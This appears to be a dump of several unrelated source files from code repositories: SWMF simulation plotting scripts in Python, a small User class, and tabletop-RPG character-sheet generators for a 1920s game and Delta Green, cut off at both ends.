# we are assuming our hypothesis about the number of
# entries is NOT necessarily true. So we are not checking
# this assert.
#assert nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th == ndata
_r, _ph, _th = [0.,], [0.,], [0.,]
if complete:
assert not checks, ' [-] flag "checks" must be False!\n'
# we walk all the entries one by one, disregarding the
# parameters 'nc', 'nRoot', 'nLevel'
ind = 0
while ind < r.size:
if (ind % 4096 == 0.0):
logger.debug(' [+] ind: %d/%d' % (ind,r.size))
if not any(np.abs(np.array(_r) - r[ind]) < eps):
_r.append(r[ind]);
if not any(np.abs(np.array(_ph) - ph[ind]) < eps):
_ph.append(ph[ind])
if not any(np.abs(np.array(_th) - th[ind]) < eps):
_th.append(th[ind])
ind += 1
else:
# we assume the ASCII file has the entire structure of
# cells and children-block
assert not(complete) and checks,\
' [-] the flags "complete" and "check" must be False and True!\n'
ib = 0
while ib*(nc_r*nc_th*nc_ph) < r.size:
#print ' sub-block: ', ib
ind = ib*(nc_r*nc_ph*nc_th);
if not any(np.abs(np.array(_r) - r[ind]) < eps):
_r.append(r[ind]);
if not any(np.abs(np.array(_ph) - ph[ind]) < eps):
_ph.append(ph[ind])
if not any(np.abs(np.array(_th) - th[ind]) < eps):
_th.append(th[ind])
ib += 1
# delete the 1st element (= 0.0)
_r = np.array(_r)[1:]
_ph = np.array(_ph)[1:]
_th = np.array(_th)[1:]
# sort them
_r.sort(); _ph.sort(); _th.sort()
if checks:
logger.info(' [+] Check for size consistencies...')
expect_r = nb_r *nc_r if complete else nb_r
expect_ph = nc_ph*nc_ph if complete else nb_ph
expect_th = nc_th*nc_th if complete else nb_th
# check we did things right!
assert _r.size == expect_r, \
'_r.size:%d; expected:%d'%(_r.size, expect_r)
assert _ph.size == expect_ph
assert _th.size == expect_th
return _r, _ph, _th
def show_walk(fname, nc, nRoot, nLevel, checks=True, complete_domain_walk=False, prefix='walk', FirstLast=(None,None), dpi=100):
np.set_printoptions(precision=2, linewidth=200)
r, ph, th, Bmod = read_data(fname)
_r, _ph, _th = get_domains([r,ph,th], nc, nRoot, nLevel,
complete=complete_domain_walk, checks=checks)
nc_r, nc_ph, nc_th = nc
eps = 0.005
# fig
fig = figure(1, figsize=(12,8))
ax = fig.add_subplot(111, projection='3d')
ax.set_xlabel('R')
ax.set_ylabel('PHI')
ax.set_zlabel('THETA')
# plot the Root blocks
_opt = {'c':'b', 'marker':'^', 'alpha':0.4, 's':35}
ax.scatter( 0, 0, 0, **_opt)
ax.scatter( 0, 0, 2**nLevel-1, **_opt)
ax.scatter( 0, 2**nLevel-1, 0, **_opt)
ax.scatter(2**nLevel-1, 0, 0, **_opt)
ax.scatter(2**nLevel-1, 2**nLevel-1, 0, **_opt)
ax.scatter( 0, 2**nLevel-1, 2**nLevel-1, **_opt)
ax.scatter(2**nLevel-1, 0, 2**nLevel-1, **_opt)
ax.scatter(2**nLevel-1, 2**nLevel-1, 2**nLevel-1, **_opt)
#while ib*(nc_r*nc_th*nc_ph) < r.size:
#while ib < 240:
# start block and final block
nc_cell = nc_r*nc_ph*nc_th
assert FirstLast != (None,None), ' wrong input for first/last blocks!\n'
ok_fl = None not in FirstLast
if None not in FirstLast:
# plot in the range 'FirstLast'
ib_ini, ib_end = FirstLast
elif FirstLast[1] is not None:
# plot the last FirstLast[1] blocks
ib_ini = r.size/nc_cell - FirstLast[1] #8*8*8 #0
ib_end = r.size/nc_cell - 1 #239
elif FirstLast[0] is not None:
# plot the first FirstLast[0] blocks
ib_ini = 0
ib_end = FirstLast[0] - 1
# limits for 3D plot
all__i_r = [(np.abs(_r - r[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
all__i_ph = [(np.abs(_ph - ph[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
all__i_th = [(np.abs(_th - th[_ib*nc_cell]) < eps).nonzero()[0][0] \
for _ib in range(ib_ini,ib_end)]
ax.set_xlim(np.min(all__i_r), np.max(all__i_r))
ax.set_ylim(np.min(all__i_ph), np.max(all__i_ph))
ax.set_zlim(np.min(all__i_th), np.max(all__i_th))
# We'll walk the 1st point of every children-block (i.e. the
# smallest group of cells)
for ib in range(ib_ini, ib_end+1):
print ' sub-block (#%d): '%(ib-ib_ini), ib, '; ',
ind = ib*(nc_r*nc_ph*nc_th);
# find the coordinate where it coincides with any
# of the (_r, _ph, _th)
i_r = (np.abs(_r - r[ind]) < eps).nonzero()[0][0]
i_ph = (np.abs(_ph - ph[ind]) < eps).nonzero()[0][0]
i_th = (np.abs(_th - th[ind]) < eps).nonzero()[0][0]
#if any(r > _r[-1]):
# import pdb; pdb.set_trace()
print i_r, i_ph, i_th,
print '; %.2f %.2f %.2f' % (r[ind], ph[ind]*r2d, th[ind]*r2d)
ax.scatter(i_r, i_ph, i_th, c='r', marker='o', s=5)
ax_text = ax.text(8, 0, 18,
'(%d,%d,%d)'%(i_r,i_ph,i_th),
fontsize=20)
# remove the text from figure:
# https://stackoverflow.com/questions/4981815/how-to-remove-lines-in-a-matplotlib-plot#13575495
fname_fig = prefix + '_%05d'%(ib-ib_ini) + '.png'
fig.savefig(fname_fig, dpi=dpi, bbox_inches='tight')
ax_text.remove()
#fig.show()
close(fig)
if __name__=='__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-c', '--checks',
action='store_true',
default=False,
help='checks size consitencies in the number of entries of the input file',
)
parser.add_argument(
'-p', '--prefix',
type=str,
default='walk',
help='prefix for figures',
)
parser.add_argument(
'-fi', '--fname_inp',
type=str,
default='../../run__chip0_xxxvii/SC/IO2/3d__var_1_n00000005.out',
help='input ASCII filename',
)
parser.add_argument(
'-nLevel', '--nLevel',
type=int,
default=3,
help='nLevel parameter of #GRIDLEVEL',
)
parser.add_argument(
'-first', '--first',
type=int,
default=None,
help='first ID of the sub-block',
)
parser.add_argument(
'-last', '--last',
type=int,
default=None,
help='last ID of the sub-block',
)
parser.add_argument(
'-dpi', '--dpi',
type=int,
default=100,
help='dpi parameter for pylab.figure.savefig()',
)
pa = parser.parse_args()
#--- numpy print settings
np.set_printoptions(precision=2, linewidth=230)
#--- logging
if pa.verbose in ('debug', 'info'):
logger.setLevel(getattr(logging, pa.verbose.upper()))
else:
raise SystemExit(' [-] Invalid argument: %s\n'%pa.verbose)
#---
#_r, _ph, _th = get_domains(fnm, [6,4,4], [8,8,4], 2)
#for isb in range(60):
# i_r, i_ph, i_th = get_subcoord(isb, iLevel=2)
# print isb, i_r, i_ph, i_th
#--- walking
#try:
# show_walk(pa.fname_inp, [6,4,4], [8,8,4], pa.nLevel, checks=pa.checks, complete_domain_walk=False, prefix=pa.prefix, FirstLast=(pa.first,pa.last), dpi=pa.dpi)
#except KeyboardInterrupt:
# print " > Keyboard Interrupt... "
#--- new extraction method
o = get_array_vars(pa.fname_inp,
checks=pa.checks,
complete_domain_walk=True,
vdict=None)
#EOF
```
#### File: swmf_figs/src/fparsers.py
```python
import argparse, os, glob
import numpy as np
import shared.funcs as sf
class cutter__3d_cut(object):
"""
manipulate data && build 3D plots
"""
def __init__(self):
"""
First thing to do is build the parser
"""
self.help = """
Module to make a 3d-cut plot; two cuts: one in the r coordinate and other in phi).
"""
self.parser = parser = argparse.ArgumentParser(
description="""this gral description...""",
add_help=False
)
parser.add_argument(
'-clim', '--clim',
type=float,
nargs=2,
default=[None, None],
help='colorbar limits',
)
parser.add_argument(
'-cs', '--cb_scale',
type=str,
default='log', # 'log'
help='colorbar scale ("linear" or "log")',
)
parser.add_argument(
'-ro', '--ro',
type=float,
default=5.0,
help='radius for the spherical shell to be plotted.',
)
parser.add_argument(
'-pho', '--pho',
type=float,
default=0.0,
help='longitude value for the cut',
)
parser.add_argument(
'-dlon', '--dlon',
type=float,
default=0.0,
help='interval width for the cut in longitude',
)
parser.add_argument(
'-rr', '--r_range',
type=float,
nargs=2,
default=[2., 5.],
help='radius for the spherical shell to be plotted.',
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-pazim', '--pazim', #action='store',
type=float,
default=-60.,
help='perspective azimuth',
)
parser.add_argument(
'-dpi', '--dpi', #action='store',
type=int,
default=100,
help='dots per inch for savefig()',
)
def run(self, pa, **kws):
custom_data = kws['custom_data']
#--- build figs
for finp in kws['finp_list_proc']:
if not pa.fname_inp: # massive mode
fname_fig = finp.replace('.h5','__'+pa.vname+'.png')
if pa.dir_dst:
# change the dir path
fname_fig = pa.dir_dst + '/' + fname_fig.split('/')[-1]
else: # individual mode
fname_fig = pa.fname_fig
sf.make_3dplot(
finp,
fname_fig,
pa.clim,
vnames = custom_data.vnames,
data_processor = getattr(custom_data, 'process_'+pa.vname),
verbose = pa.verbose,
ro = pa.ro,
pho = pa.pho,
r_range = pa.r_range,
pazim = pa.pazim,
cscale = pa.cb_scale, # colorbar scale
dpi = pa.dpi,
wtimelabel = True,
figsize = kws.get('figsize', getattr(pa, 'figsize', (7.2,4.8))),
)
class cutter__r_cut(object):
"""
manipulate data && build 2D plots
"""
def __init__(self):
"""
First thing to do is build the parser
"""
self.help = """
Module to make a 2d-cut plot; a cut in the r coordinate.
"""
self.parser = parser = argparse.ArgumentParser(
description="""this gral description...""",
add_help=False
)
parser.add_argument(
'-clim', '--clim',
type=float,
nargs=2,
default=[None, None],
help='colorbar limits',
)
parser.add_argument(
'-dlon', '--dlon',
type=float,
default=[None,None], #[0., 360.],
nargs=2,
metavar=('LON1','LON2'),
help='interval width in longitude, in degrees.',
)
parser.add_argument(
'-dth', '--dth',
type=float,
default=[None,None], #[-90., 90.],
nargs=2,
metavar=('TH1','TH2'),
help='interval width in theta (co-latitude?), in degrees.',
)
parser.add_argument(
'-ro', '--ro',
type=float,
default=5.0,
help='radius for the spherical shell to be plotted.',
)
parser.add_argument(
'-cs', '--cb_scale',
type=str,
default='log',
help='colorbar scale ("linear" or "log")',
)
parser.add_argument(
'-cl', '--cb_label',
type=str,
default='|B| [G]',
help='colorbar label (e.g. variable name and units)',
)
parser.add_argument(
'-i', '--interactive',
action='store_true',
default=False,
help="""If used, shows an interactive IPython plot; otherwise,
it creates a .png figure.""",
)
parser.add_argument(
'-v', '--verbose',
type=str,
default='debug',
help='verbosity level (debug=minimal, info=extended)',
)
parser.add_argument(
'-figsize', '--figsize',
type=float,
default=[6,4],
nargs=2,
metavar=('WIDTH','HEIGTH'),
help='figure size',
)
def run(self, pa, **kws):
custom_data = kws['custom_data']
#--- build figs
for finp in kws['finp_list_proc']:
if not pa.fname_inp: # massive mode
fname_fig = finp.replace('.h5','__'+pa.vname+'.png')
if pa.dir_dst:
# change the dir path
fname_fig = pa.dir_dst + '/' + fname_fig.split('/')[-1]
else: # individual mode
fname_fig = pa.fname_fig
o = sf.r_cut(
finp,
fname_fig,
ro=pa.ro,
dph=pa.dlon,
dth=pa.dth,
figsize=kws.get('figsize', getattr(pa, 'figsize', (6,4))),
verbose=pa.verbose,
vnames=custom_data.vnames,
data_processor=getattr(custom_data, 'process_'+pa.vname),
cscale=pa.cb_scale, # color scale
colormap=kws.get('colormap', getattr(pa, 'colormap', 'gray')),
cb_label=pa.cb_label,
interactive=pa.interactive,
wtimelabel = True,
)
#EOF
``` |
{
"source": "JimStockman/python-dreck",
"score": 3
} |
#### File: JimStockman/python-dreck/user.py
```python
class User:
def __init__(self, name, email):
self.name = name
self.email = email
def print_info(self):
print('My name is', self.name, 'and my email is', self.email)
``` |
{
"source": "jimstorch/1920Gen",
"score": 3
} |
#### File: jimstorch/1920Gen/generator.py
```python
from random import randint, shuffle, choice
from PyPDF2 import PdfFileReader, PdfFileWriter
from reportlab.pdfgen import canvas
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
STAT_COLOR = (.0, .4, .7)
TEXT_COLOR = (.0, .4, .7)
DEFAULT_FONT = 'FellEnglish-Bold'
pdfmetrics.registerFont(TTFont('FellEnglish-Bold', 'data/FellEnglish-Bold.ttf'))
with open('data/male.txt') as f:
males = f.read().splitlines()
with open('data/female.txt') as f:
females = f.read().splitlines()
with open('data/surnames.txt') as f:
surnames = f.read().splitlines()
with open('data/towns1920.txt') as f:
towns = f.read().splitlines()
def male_name():
return choice(males) + ' ' + choice(surnames)
def female_name():
return choice(females) + ' ' + choice(surnames)
class Character(object):
def d6(self, count=1):
sum = 0
for x in range(count):
sum += randint(1,6)
return sum
def improvement_check(self, count):
for x in range(count):
improv = randint(1,100)
if improv > self.education:
self.education += randint(1,10)
if self.education > 99:
self.education = 99
def deduct(self, point_list):
shuffle(point_list)
self.strength -= point_list[0]
self.constitution -= point_list[1]
self.dexterity -= point_list[2]
def sex(self, sex):
self.sex = sex
def name(self, name):
self.name = name
class Character1920(Character):
def __init__(self):
self.birthplace = choice(towns)
self.strength = self.d6(3) * 5
self.size = (self.d6(2) + 6) * 5
self.dexterity = self.d6(3) * 5
self.appearance = self.d6(3) * 5
self.constitution = self.d6(3) * 5
self.intelligence = (self.d6(2) + 6) * 5
self.education = (self.d6(2) + 6) * 5
self.power = self.d6(3) * 5
self.luck = (self.d6(2) + 6) * 5
self.age = 15 + randint(0,64)
if self.age >= 15 and self.age <= 19:
self.education -= 5
l1 = randint(1,5)
l2 = 5 - l1
self.strength -= l1
self.size -= l2
luck2 = (self.d6(2) + 6) * 5
if self.luck < luck2:
self.luck = luck2
elif self.age >= 20 and self.age <= 39:
self.improvement_check(1)
elif self.age >= 40 and self.age <= 49:
self.improvement_check(2)
self.deduct([1,2,2])
self.appearance -= 5
elif self.age >= 50 and self.age <= 59:
self.improvement_check(3)
self.deduct([3,3,4])
self.appearance -= 10
elif self.age >= 60 and self.age <= 69:
self.improvement_check(4)
self.deduct([6,7,7])
self.appearance -= 15
elif self.age >= 70 and self.age <= 79:
self.improvement_check(4)
self.deduct([13,13,14])
self.appearance -= 20
elif self.age >= 80:
self.improvement_check(4)
self.deduct([26,27,27])
self.appearance -= 25
self.hitpoints = int((self.size + self.constitution) / 10)
if self.dexterity < self.size and self.strength < self.size:
self.movement = 7
if self.strength >= self.size or self.dexterity >= self.size:
self.movement = 8
if self.strength > self.size and self.dexterity > self.size:
self.movement = 9
if self.age >= 40 and self.age <= 49:
self.movement -= 1
elif self.age >= 50 and self.age <= 59:
self.movement -= 2
elif self.age >= 60 and self.age <= 69:
self.movement -= 3
elif self.age >= 70 and self.age <= 79:
self.movement -= 4
elif self.age >= 80:
self.movement -= 5
class PDF1920(object):
def __init__(self, width=612, height=792):
self.c = canvas.Canvas('out.pdf')
self.c.setPageSize((width, height))
def save_pdf(self):
self.c.save()
def font_size(self, size):
self.c.setFontSize(size)
def font_color(self, r,g,b):
self.c.setFillColorRGB(r,g,b)
def draw_string(self, x, y, text):
self.c.drawString(x,y,str(text))
def _add_stat(self,x,y,value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(x,y,value)
one_half = str(int(value / 2))
one_fifth = str(int(value / 5))
self.font_size(9)
self.draw_string(x+26, y+8, one_half)
self.draw_string(x+26, y-6, one_fifth)
def _add_text(self,x,y,text):
self.font_size(12)
self.font_color(*TEXT_COLOR)
self.draw_string(x,y,str(text))
def name(self, text):
self._add_text(142,739,text)
def player(self, text):
self._add_text(142,719,text)
def occupation(self, text):
self._add_text(164,699,text)
def age(self, text):
self._add_text(136,680,text)
def sex(self, text):
self._add_text(220,680,text)
def residence(self, text):
self._add_text(155,658,text)
def birthplace(self, text):
self._add_text(155,639,text)
def str(self, value):
self._add_stat(332,710,value)
def dex(self, value):
self._add_stat(419,710,value)
def int(self, value):
self._add_stat(511,710,value)
def con(self, value):
self._add_stat(332,678,value)
def app(self, value):
self._add_stat(419,678,value)
def pow(self, value):
self._add_stat(511,678,value)
def siz(self, value):
self._add_stat(332,647,value)
def edu(self, value):
self._add_stat(419,647,value)
def mov(self,value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(511,647,value)
def hp(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(100,582,value)
def luck(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(100,510,value)
def sanity(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(480,582,value)
def magic(self, value):
self.font_color(*STAT_COLOR)
self.font_size(13)
self.draw_string(480,510,value)
def add_character(self, char):
self.c.drawImage('data/1920blank.png',0,0,612,792)
self.c.setFont(DEFAULT_FONT,12)
self.name(char.name)
self.age(char.age)
self.sex(char.sex)
#o.player('<NAME>')
#o.occupation('Librarian')
#o.residence('Arkham, MA')
self.birthplace(char.birthplace)
self.str(char.strength)
self.dex(char.dexterity)
self.int(char.intelligence)
self.con(char.constitution)
self.app(char.appearance)
self.pow(char.power)
self.sanity(char.power)
self.magic(int(char.power / 5))
self.siz(char.size)
self.edu(char.education)
self.mov(char.movement)
self.hp(char.hitpoints)
self.luck(char.luck)
self.c.showPage()
p = PDF1920()
for x in range(200):
c=Character1920()
c.sex('Male')
c.name(male_name())
p.add_character(c)
p.save_pdf()
``` |
{
"source": "jimstorch/DGGen",
"score": 2
} |
#### File: jimstorch/DGGen/generator.py
```python
import argparse
import csv
import datetime
import json
import logging
import os
import sys
import warnings
from collections import defaultdict
from copy import copy
from dataclasses import dataclass
from itertools import islice, cycle, chain
from random import randint, shuffle, choice, sample
from textwrap import shorten, wrap
from typing import List, Any, Dict, Tuple
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfgen import canvas
script_name = os.path.basename(sys.argv[0])
description = """
Generate characters for the Delta Green pen-and-paper roleplaying game from Arc Dream Publishing.
"""
__version__ = "1.4"
logger = logging.getLogger(script_name)
TEXT_COLOR = (0, 0.1, 0.5)
DEFAULT_FONT = "Special Elite"
MONTHS = ("JAN", "FEB", "MAR", "APR", "MAY", "JUN", "JUL", "AUG", "SEP", "OCT", "NOV", "DEC")
SUGGESTED_BONUS_CHANCE = 75
def main():
options = get_options()
init_logger(options.verbosity)
logger.debug(options)
data = load_data(options)
pages_per_sheet = 2 if options.equip else 1
professions = [data.professions[options.type]] if options.type else data.professions.values()
p = Need2KnowPDF(options.output, professions, pages_per_sheet=pages_per_sheet)
for profession in professions:
label = generate_label(profession)
p.bookmark(label)
for sex in islice(
cycle(["female", "male"]), options.count or profession["number_to_generate"]
):
c = Need2KnowCharacter(
data=data,
sex=sex,
profession=profession,
label_override=options.label,
employer_override=options.employer,
)
if options.equip:
c.equip(profession.get("equipment-kit", None))
c.print_footnotes()
p.add_page(c.d)
if pages_per_sheet >= 2:
p.add_page_2(c.e)
p.save_pdf()
logger.info("Wrote %s", options.output)
class Need2KnowCharacter(object):
statpools = [
[13, 13, 12, 12, 11, 11],
[15, 14, 12, 11, 10, 10],
[17, 14, 13, 10, 10, 8],
]
DEFAULT_SKILLS = {
"accounting": 10,
"alertness": 20,
"athletics": 30,
"bureaucracy": 10,
"criminology": 10,
"disguise": 10,
"dodge": 30,
"drive": 20,
"firearms": 20,
"first aid": 10,
"heavy machinery": 10,
"history": 10,
"humint": 10,
"melee weapons": 30,
"navigate": 10,
"occult": 10,
"persuade": 20,
"psychotherapy": 10,
"ride": 10,
"search": 20,
"stealth": 10,
"survival": 10,
"swim": 20,
"unarmed combat": 40,
}
BONUS = [
"accounting",
"alertness",
"anthropology",
"archeology",
"art1",
"artillery",
"athletics",
"bureaucracy",
"computer science",
"craft1value",
"criminology",
"demolitions",
"disguise",
"dodge",
"drive",
"firearms",
"first aid",
"forensics",
"heavy machinery",
"heavy weapons",
"history",
"humint",
"law",
"medicine",
"melee weapons",
"militaryscience1value",
"navigate",
"occult",
"persuade",
"pharmacy",
"pilot1value",
"psychotherapy",
"ride",
"science1value",
"search",
"sigint",
"stealth",
"surgery",
"survival",
"swim",
"unarmed combat",
"language1",
]
def __init__(self, data, sex, profession, label_override=None, employer_override=None):
self.data = data
self.profession = profession
self.sex = sex
# Hold all dictionaries
self.d = {}
self.e = {}
self.footnotes = defaultdict(
iter(
["*", "†", "‡", "§", "¶", "**", "††", "‡‡", "§§", "¶¶", "***", "†††", "‡‡‡", "§§§"]
).__next__
)
self.generate_demographics(label_override, employer_override)
self.generate_stats()
self.generate_derived_attributes()
self.generate_skills()
def generate_demographics(self, label_override, employer_override):
if self.sex == "male":
self.d["male"] = "X"
self.d["name"] = (
choice(self.data.family_names).upper() + ", " + choice(self.data.male_given_names)
)
else:
self.d["female"] = "X"
self.d["name"] = (
choice(self.data.family_names).upper() + ", " + choice(self.data.female_given_names)
)
self.d["profession"] = label_override or self.profession["label"]
self.d["employer"] = employer_override or ", ".join(
e
for e in [self.profession.get("employer", ""), self.profession.get("division", "")]
if e
)
self.d["nationality"] = "(U.S.A.) " + choice(self.data.towns)
self.d["age"] = "%d (%s %d)" % (randint(24, 55), choice(MONTHS), (randint(1, 28)))
def generate_stats(self):
rolled = [[sum(sorted([randint(1, 6) for _ in range(4)])[1:]) for _ in range(6)]]
pool = choice(self.statpools + rolled)
shuffle(pool)
for score, stat in zip(
pool, ["strength", "constitution", "dexterity", "intelligence", "power", "charisma"]
):
self.d[stat] = score
self.d[f"{stat}_x5"] = score * 5
self.d[f"{stat}_distinguishing"] = self.distinguishing(stat, score)
def generate_derived_attributes(self):
self.d["hitpoints"] = int(round((self.d["strength"] + self.d["constitution"]) / 2.0))
self.d["willpower"] = self.d["power"]
self.d["sanity"] = self.d["power"] * 5
self.d["breaking point"] = self.d["power"] * 4
self.damage_bonus = ((self.d["strength"] - 1) >> 2) - 2
self.d["damage bonus"] = "DB=%d" % self.damage_bonus
def generate_skills(self):
# Default skills
self.d.update(self.DEFAULT_SKILLS)
# Professional skills
self.d.update(self.profession["skills"]["fixed"])
for skill, score in sample(
self.profession["skills"].get("possible", {}).items(),
self.profession["skills"].get("possible-count", 0),
):
self.d[skill] = score
for i in range(self.profession["bonds"]):
self.d[f"bond{i}"] = self.d["charisma"]
# Bonus skills
self.generate_bonus_skills(self.profession)
def generate_bonus_skills(self, profession):
bonus_skills = [
s
for s in profession["skills"].get("bonus", [])
if randint(1, 100) <= SUGGESTED_BONUS_CHANCE
] + sample(self.BONUS, len(self.BONUS))
bonuses_applied = 0
while bonuses_applied < 8:
skill = bonus_skills.pop(0)
boosted = self.d.get(skill, 0) + 20
if boosted <= 80:
self.d[skill] = boosted
bonuses_applied += 1
logger.debug("%s, boosted %s to %s", self, skill, boosted)
else:
logger.info(
"%s, Skipped boost - %s already at %s", self, skill, self.d.get(skill, 0)
)
def __str__(self):
return ", ".join(
[
self.d.get(i)
for i in ("name", "profession", "employer", "department")
if self.d.get(i)
]
)
def distinguishing(self, field, value):
return choice(self.data.distinguishing.get((field, value), [""]))
def equip(self, kit_name=None):
weapons = [self.data.weapons["unarmed"]]
if kit_name:
kit = self.data.kits[kit_name]
weapons += self.build_weapon_list(kit["weapons"])
gear = []
for item in kit["armour"] + kit["gear"]:
notes = (
(" ".join(self.store_footnote(n) for n in item["notes"]) + " ")
if "notes" in item
else ""
)
text = notes + (self.data.armour[item["type"]] if "type" in item else item["text"])
gear.append(text)
wrapped_gear = list(chain(*[wrap(item, 55, subsequent_indent=" ") for item in gear]))
if len(wrapped_gear) > 22:
logger.warning("Too much gear - truncated.")
for i, line in enumerate(wrapped_gear):
self.e[f"gear{i}"] = line
if len(weapons) > 7:
logger.warning("Too many weapons %s - truncated.", weapons)
for i, weapon in enumerate(weapons[:7]):
self.equip_weapon(i, weapon)
def build_weapon_list(self, weapons_to_add):
result = []
for weapon_to_add in weapons_to_add:
if "type" in weapon_to_add:
weapon = copy(self.data.weapons.get(weapon_to_add["type"], None))
if weapon:
if "notes" in weapon_to_add:
weapon["notes"] = weapon_to_add["notes"]
result += (
[weapon]
if "chance" not in weapon_to_add
or weapon_to_add["chance"] >= randint(1, 100)
else []
)
else:
logger.error("Unknown weapon type %s", weapon_to_add["type"])
elif "one-of" in weapon_to_add:
result += self.build_weapon_list([choice(weapon_to_add["one-of"])])
elif "both" in weapon_to_add:
result += self.build_weapon_list(w for w in weapon_to_add["both"])
else:
logger.error("Don't understand weapon %r", weapon_to_add)
return result
def equip_weapon(self, slot, weapon):
self.e[f"weapon{slot}"] = shorten(weapon["name"], 15, placeholder="…")
roll = int(self.d.get(weapon["skill"], 0) + (weapon["bonus"] if "bonus" in weapon else 0))
self.e[f"weapon{slot}_roll"] = f"{roll}%"
if "base-range" in weapon:
self.e[f"weapon{slot}_range"] = weapon["base-range"]
if "ap" in weapon:
self.e[f"weapon{slot}_ap"] = f"{weapon['ap']}"
if "lethality" in weapon:
lethality = weapon["lethality"]
lethality_note_indicator = (
self.store_footnote(lethality["special"]) if "special" in lethality else None
)
self.e[f"weapon{slot}_lethality"] = (
f"{lethality['rating']}%" if lethality["rating"] else ""
) + (f" {lethality_note_indicator}" if lethality_note_indicator else "")
if "ammo" in weapon:
self.e[f"weapon{slot}_ammo"] = f"{weapon['ammo']}"
if "kill-radius" in weapon:
self.e[f"weapon{slot}_kill_radius"] = f"{weapon['kill-radius']}"
if "notes" in weapon:
self.e[f"weapon{slot}_note"] = " ".join(self.store_footnote(n) for n in weapon["notes"])
if "damage" in weapon:
damage = weapon["damage"]
damage_note_indicator = (
self.store_footnote(damage["special"]) if "special" in damage else None
)
if "dice" in damage:
damage_modifier = (damage["modifier"] if "modifier" in damage else 0) + (
self.damage_bonus if "db-applies" in damage and damage["db-applies"] else 0
)
damage_roll = f"{damage['dice']}D{damage['die-type']}" + (
f"{damage_modifier:+d}" if damage_modifier else ""
)
else:
damage_roll = ""
self.e[f"weapon{slot}_damage"] = damage_roll + (
f" {damage_note_indicator}" if damage_note_indicator else ""
)
def print_footnotes(self):
notes = list(
chain(
*[
wrap(f"{pointer} {note}", 40, subsequent_indent=" ")
for (note, pointer) in list(self.footnotes.items())
]
)
)
if len(notes) > 12:
logger.warning("Too many footnotes - truncated.")
for i, note in enumerate(notes[:12]):
self.e[f"note{i}"] = note
def store_footnote(self, note):
"""Returns indicator character"""
return self.footnotes[note] if note else None
class Need2KnowPDF(object):
# Location of form fields in Points (1/72 inch) - 0,0 is bottom-left - and font size
field_xys = {
# Personal Data
"name": (75, 693, 11),
"profession": (343, 693, 11),
"employer": (75, 665, 11),
"nationality": (343, 665, 11),
"age": (185, 640, 11),
"birthday": (200, 640, 11),
"male": (98, 639, 11),
"female": (76, 639, 11),
# Statistical Data
"strength": (136, 604, 11),
"constitution": (136, 586, 11),
"dexterity": (136, 568, 11),
"intelligence": (136, 550, 11),
"power": (136, 532, 11),
"charisma": (136, 514, 11),
"strength_x5": (172, 604, 11),
"constitution_x5": (172, 586, 11),
"dexterity_x5": (172, 568, 11),
"intelligence_x5": (172, 550, 11),
"power_x5": (172, 532, 11),
"charisma_x5": (172, 514, 11),
"strength_distinguishing": (208, 604, 11),
"constitution_distinguishing": (208, 586, 11),
"dexterity_distinguishing": (208, 568, 11),
"intelligence_distinguishing": (208, 550, 11),
"power_distinguishing": (208, 532, 11),
"charisma_distinguishing": (208, 514, 11),
"damage bonus": (555, 200, 11),
"hitpoints": (195, 482, 11),
"willpower": (195, 464, 11),
"sanity": (195, 446, 11),
"breaking point": (195, 428, 11),
"bond0": (512, 604, 11),
"bond1": (512, 586, 11),
"bond2": (512, 568, 11),
"bond3": (512, 550, 11),
# Applicable Skill Sets
"accounting": (200, 361, 11),
"alertness": (200, 343, 11),
"anthropology": (200, 325, 11),
"archeology": (200, 307, 11),
"art1": (200, 289, 11),
"art2": (200, 281, 11),
"artillery": (200, 253, 11),
"athletics": (200, 235, 11),
"bureaucracy": (200, 217, 11),
"computer science": (200, 200, 11),
"craft1label": (90, 185, 9),
"craft1value": (200, 185, 9),
"craft2label": (90, 177, 9),
"craft2value": (200, 177, 9),
"craft3label": (90, 169, 9),
"craft3value": (200, 169, 9),
"craft4label": (90, 161, 9),
"craft4value": (200, 161, 9),
"criminology": (200, 145, 11),
"demolitions": (200, 127, 11),
"disguise": (200, 109, 11),
"dodge": (200, 91, 11),
"drive": (200, 73, 11),
"firearms": (200, 54, 11),
"first aid": (361, 361, 11),
"forensics": (361, 343, 11),
"heavy machinery": (361, 325, 11),
"heavy weapons": (361, 307, 11),
"history": (361, 289, 11),
"humint": (361, 270, 11),
"law": (361, 253, 11),
"medicine": (361, 235, 11),
"melee weapons": (361, 217, 11),
"militaryscience1value": (361, 199, 11),
"militaryscience1label": (327, 199, 11),
"militaryscience2value": (361, 186, 11),
"militaryscience2label": (327, 186, 11),
"navigate": (361, 163, 11),
"occult": (361, 145, 11),
"persuade": (361, 127, 11),
"pharmacy": (361, 109, 11),
"pilot1value": (361, 91, 9),
"pilot1label": (290, 91, 9),
"pilot2value": (361, 83, 9),
"pilot2label": (290, 83, 9),
"psychotherapy": (361, 54, 11),
"ride": (521, 361, 11),
"science1label": (442, 347, 9),
"science1value": (521, 347, 9),
"science2label": (442, 340, 9),
"science2value": (521, 340, 9),
"science3label": (442, 333, 9),
"science3value": (521, 333, 9),
"science4label": (442, 326, 9),
"science4value": (521, 326, 9),
"search": (521, 307, 11),
"sigint": (521, 289, 11),
"stealth": (521, 270, 11),
"surgery": (521, 253, 11),
"survival": (521, 235, 11),
"swim": (521, 217, 11),
"unarmed combat": (521, 200, 11),
"unnatural": (521, 181, 11),
"language1": (521, 145, 11),
"language2": (521, 127, 11),
"language3": (521, 109, 11),
"skill1": (521, 91, 11),
"skill2": (521, 73, 11),
"skill3": (521, 54, 11),
# 2nd page
"weapon0": (85, 480, 11),
"weapon0_roll": (175, 480, 11),
